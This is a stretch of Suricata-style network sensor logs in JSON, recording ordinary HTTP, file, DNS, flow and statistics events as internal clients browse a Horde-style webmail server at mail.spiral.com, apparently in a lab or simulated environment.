{"timestamp":"2020-02-29T00:01:17.692989+0000","flow_id":116207484000165,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52640,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/folders\/sent.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":424},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/folders\/sent.png","state":"CLOSED","stored":false,"size":424,"tx_id":16}} {"timestamp":"2020-02-29T00:01:17.733381+0000","flow_id":788481534977091,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52646,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":14,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/folders\/plus.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":351}} {"timestamp":"2020-02-29T00:01:17.737302+0000","flow_id":116207484000165,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52640,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":17,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/folders\/folder.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":211}} {"timestamp":"2020-02-29T00:01:18.000667+0000","flow_id":1743257055554502,"event_type":"flow","src_ip":"192.168.10.81","src_port":52626,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":5,"pkts_toclient":5,"bytes_toserver":773,"bytes_toclient":767,"start":"2020-02-29T00:00:12.224198+0000","end":"2020-02-29T00:00:17.231773+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:01:18.000924+0000","flow_id":67704414066182,"event_type":"flow","src_ip":"192.168.10.81","src_port":52624,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":8,"pkts_toclient":7,"bytes_toserver":1402,"bytes_toclient":2795,"start":"2020-02-29T00:00:12.185862+0000","end":"2020-02-29T00:00:17.230742+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} 
{"timestamp":"2020-02-29T00:01:18.001076+0000","flow_id":937559845345076,"event_type":"flow","src_ip":"192.168.10.81","src_port":52622,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":22,"pkts_toclient":20,"bytes_toserver":3698,"bytes_toclient":15034,"start":"2020-02-29T00:00:09.562996+0000","end":"2020-02-29T00:00:17.317658+0000","age":8,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:01:19.991004+0000","flow_id":1043121556102940,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":37302,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":39943,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:01:20.096028+0000","flow_id":1043121556102940,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":37302,"proto":"UDP","dns":{"type":"answer","id":39943,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:01:20.096028+0000","flow_id":1043121556102940,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":37302,"proto":"UDP","dns":{"type":"answer","id":39943,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:01:20.243435+0000","flow_id":752305025627883,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":44785,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":20497,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} 
{"timestamp":"2020-02-29T00:01:20.270208+0000","flow_id":1393011066924782,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34690,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/list.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6136}} {"timestamp":"2020-02-29T00:01:20.354683+0000","flow_id":752305025627883,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":44785,"proto":"UDP","dns":{"type":"answer","id":20497,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:01:20.354683+0000","flow_id":752305025627883,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":44785,"proto":"UDP","dns":{"type":"answer","id":20497,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:01:20.522450+0000","flow_id":2014930921353933,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34692,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/nag\/list.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6966}} 
{"timestamp":"2020-02-29T00:01:22.216915+0000","flow_id":1610366476737736,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52642,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/dragdrop2.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5927},"app_proto":"http","fileinfo":{"filename":"\/js\/dragdrop2.js","state":"CLOSED","stored":false,"size":22457,"tx_id":2}} {"timestamp":"2020-02-29T00:01:22.217017+0000","flow_id":1463401285748420,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52648,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/external\/base64.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1962},"app_proto":"http","fileinfo":{"filename":"\/imp\/js\/external\/base64.js","state":"CLOSED","stored":false,"size":6586,"tx_id":3}} {"timestamp":"2020-02-29T00:01:22.217071+0000","flow_id":948834138972290,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52644,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/colorpicker.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3401},"app_proto":"http","fileinfo":{"filename":"\/js\/colorpicker.js","state":"CLOSED","stored":false,"size":12973,"tx_id":2}} {"timestamp":"2020-02-29T00:01:22.402386+0000","flow_id":876743112598001,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52638,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/ico_message_off.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":468},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/ico_message_off.png","state":"CLOSED","stored":false,"size":468,"tx_id":4}} {"timestamp":"2020-02-29T00:01:22.696950+0000","flow_id":788481534977091,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52646,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/folders\/plus.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":351},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/folders\/plus.png","state":"CLOSED","stored":false,"size":351,"tx_id":14}} 
{"timestamp":"2020-02-29T00:01:22.698813+0000","flow_id":116207484000165,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52640,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/folders\/folder.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":211},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/folders\/folder.png","state":"CLOSED","stored":false,"size":211,"tx_id":17}} {"timestamp":"2020-02-29T00:01:23.123898+0000","flow_id":136591399180898,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52650,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/az.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":264}} {"timestamp":"2020-02-29T00:01:23.144741+0000","flow_id":992711525217637,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":57146,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":50836,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:01:23.170777+0000","flow_id":136591399180898,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52650,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/az.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) 
Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":264},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/az.png","state":"CLOSED","stored":false,"size":264,"tx_id":0}} {"timestamp":"2020-02-29T00:01:23.249667+0000","flow_id":992711525217637,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":57146,"proto":"UDP","dns":{"type":"answer","id":50836,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:01:23.249667+0000","flow_id":992711525217637,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":57146,"proto":"UDP","dns":{"type":"answer","id":50836,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:01:23.369326+0000","flow_id":136591399180898,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52650,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/viewPort","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":364}} {"timestamp":"2020-02-29T00:01:23.369326+0000","flow_id":136591399180898,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":52650,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/viewPort","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":364},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/viewPort","state":"CLOSED","stored":false,"size":240,"tx_id":1}} {"timestamp":"2020-02-29T00:01:23.842322+0000","flow_id":1393011066924782,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34690,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/list.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6136},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":30698,"tx_id":0}} {"timestamp":"2020-02-29T00:01:23.849154+0000","flow_id":644114799654146,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":41023,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":5114,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:01:23.954296+0000","flow_id":644114799654146,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":41023,"proto":"UDP","dns":{"type":"answer","id":5114,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:01:23.954296+0000","flow_id":644114799654146,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":41023,"proto":"UDP","dns":{"type":"answer","id":5114,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} 
{"timestamp":"2020-02-29T00:01:24.000144+0000","event_type":"stats","stats":{"uptime":13736,"capture":{"kernel_packets":132216,"kernel_drops":0},"decoder":{"pkts":132231,"bytes":91835352,"invalid":176,"ipv4":130810,"ipv6":8,"ethernet":132231,"raw":0,"null":0,"sll":0,"tcp":125852,"udp":4768,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":694,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7095616},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2659,"ssn_memcap_drop":0,"pseudo":338,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2675,"synack":2666,"rst":1192,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":135,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1707,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":99,"dcerpc_udp":0,"dns_udp":2173,"failed_udp":106},"tx":{"http":4431,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2249}},"flow_mgr":{"closed_pruned":2636,"new_pruned":15,"est_pruned":2222,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":20167,"memcap_state":0,"memcap_global":0},"http":{"memuse":162597,"memcap":0}}} 
{"timestamp":"2020-02-29T00:01:24.001024+0000","flow_id":1683591370237100,"event_type":"flow","src_ip":"192.168.10.81","src_port":52628,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":10,"pkts_toclient":11,"bytes_toserver":1639,"bytes_toclient":7608,"start":"2020-02-29T00:00:17.779436+0000","end":"2020-02-29T00:00:23.125126+0000","age":6,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:01:24.022214+0000","flow_id":1393011066924782,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34690,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/turba\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3978}} {"timestamp":"2020-02-29T00:01:24.462742+0000","flow_id":2014930921353933,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34692,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/nag\/list.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6966},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":37746,"tx_id":0}} 
{"timestamp":"2020-02-29T00:01:24.471666+0000","flow_id":1948590856745586,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":59007,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":61595,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:01:24.576661+0000","flow_id":1948590856745586,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":59007,"proto":"UDP","dns":{"type":"answer","id":61595,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:01:24.576661+0000","flow_id":1948590856745586,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":59007,"proto":"UDP","dns":{"type":"answer","id":61595,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:01:24.660332+0000","flow_id":2014930921353933,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34692,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/nag\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8105}} {"timestamp":"2020-02-29T00:01:28.331895+0000","flow_id":136591399180898,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52650,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/viewPort","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":364},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/viewPort","state":"CLOSED","stored":false,"size":592,"tx_id":1}} {"timestamp":"2020-02-29T00:01:29.000577+0000","flow_id":71243452414947,"event_type":"flow","src_ip":"192.168.10.122","src_port":56790,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-28T23:56:28.621539+0000","end":"2020-02-28T23:56:28.733376+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:01:29.023050+0000","flow_id":1393011066924782,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34690,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/turba\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3978},"app_proto":"http","fileinfo":{"filename":"\/turba\/","state":"CLOSED","stored":false,"size":19145,"tx_id":1}} {"timestamp":"2020-02-29T00:01:29.661634+0000","flow_id":2014930921353933,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34692,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/nag\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 
Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8105},"app_proto":"http","fileinfo":{"filename":"\/nag\/","state":"CLOSED","stored":false,"size":33524,"tx_id":1}} {"timestamp":"2020-02-29T00:01:29.964448+0000","flow_id":943744603502432,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":58746,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":37232,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:01:30.077302+0000","flow_id":943744603502432,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":58746,"proto":"UDP","dns":{"type":"answer","id":37232,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:01:30.077302+0000","flow_id":943744603502432,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":58746,"proto":"UDP","dns":{"type":"answer","id":37232,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:01:30.169791+0000","flow_id":679183207983578,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34694,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/turba\/add.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/turba\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":18979}} 
{"timestamp":"2020-02-29T00:01:31.000234+0000","event_type":"stats","stats":{"uptime":13743,"capture":{"kernel_packets":132263,"kernel_drops":0},"decoder":{"pkts":132278,"bytes":91855239,"invalid":176,"ipv4":130857,"ipv6":8,"ethernet":132278,"raw":0,"null":0,"sll":0,"tcp":125893,"udp":4774,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":694,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7096768},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2660,"ssn_memcap_drop":0,"pseudo":338,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2676,"synack":2667,"rst":1192,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":135,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1708,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":99,"dcerpc_udp":0,"dns_udp":2176,"failed_udp":106},"tx":{"http":4435,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2252}},"flow_mgr":{"closed_pruned":2637,"new_pruned":15,"est_pruned":2222,"bypassed_pruned":0,"flows_checked":1,"flows_notimeout":1,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65535,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":20498,"memcap_state":0,"memcap_global":0},"http":{"memuse":190556,"memcap":0}}} 
